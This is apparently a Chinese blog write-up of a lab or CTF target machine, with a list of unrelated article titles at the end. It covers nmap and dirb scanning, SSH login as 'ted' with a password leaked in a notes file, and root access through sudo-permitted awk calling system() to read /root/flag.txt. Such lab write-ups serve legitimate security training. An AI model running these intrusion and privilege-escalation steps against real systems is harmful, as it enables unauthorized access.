靶机准备

由于是.vmdk文件，新建一个虚拟机把硬盘移除，在将此vmdk文件添加为新硬盘即。

开机发现给出了ip地址：192.168.164.184，且当前网络模式为NAT



将kali也设置为NAT模式即可

kali：192.168.164.137

渗透测试

nmap扫描一下端口

nmap -sS -sV -T5 -A -p- 192.168.164.184

用dirb扫目录，

dirb http://192.168.164.184

扫描到了很多目录，先进admin目录，发现一个notes.txt文件



打开查看



里面的12345ted123好像是密码，尝试ssh连接

用户名猜测为ted，成功连接



查看不是root权限，尝试提权

首先使用sudo -l,发现用不了，用cat /etc/sudoers发现ted 目前可以已root权限运行/usr/bin/awk程序

sudo -l=当前用户可以已root身份执行的操作

cat /etc/sudoers=谁被允许已root身份执行

直接使用awk的权限读取flag

awk 'BEGIN{system("whoami")}'

awk 'BEGIN{system("ls /root")}'

awk 'BEGIN{system("cat /root/flag.txt")}'

最新文章

1. [codevs1001]舒适的路线
2. 8月17日 Power-BI关于全国房地产开发投资情况分析 QQ群视频交流开课啦
3. Linux vi 中移动光标 命令
4. DW(三):polybase基本理论
5. 【POJ】【1821】Fence
6. 文本替换sed+字段处理cut,join+awk重新编排字段
7. 在Eclipse下debug 出现Source not found for ...
8. 今日吐槽20151208.net服务器控件
9. WP8.1开发系列之隐藏顶部状态栏
10. C语言之if和switch的分别
11. MUI框架开发HTML5手机APP(一)--搭建第一个手机APP
12. OS + CentOS / http_proxy / https_proxy / dalishangwang / repo
13. Perl的数值和字符串
14. Android 常用数据操作封装类案例
15. Deepin 15.4 挂载分区
16. （一）从设计的角度来看ADT（Java）
17. StringBuffer类和String类(原文地址 : http://www.cnblogs.com/springcsc/archive/2009/12/03/1616330.html)
18. stack堆栈容器、queue队列容器和priority_queue优先队列容器（常用的方法对比与总结）
19. How to calculate elapsed / execute time in Java
20. Qt之QLocalSocket

热门文章

1. Solution -「ARC 125F」Tree Degree Subset Sum
2. suse 12 安装git客户端
3. 【摸鱼神器】基于SSM风格的Java源代码生成器 单表生成 一对一、一对多、多对多连接查询生成
4. 带你掌握Java各种日志框架
5. 2021 .NET Conf China 主题分享之-轻松玩转.NET大规模版本升级
6. 快来用这款BI分析工具，摆脱数据分析的困扰
7. docker ——从docker容器的内部，连接本机的mysql
8. java-排查
9. css样式之浮动
10. kube-scheduler源码分析（3）-抢占调度分析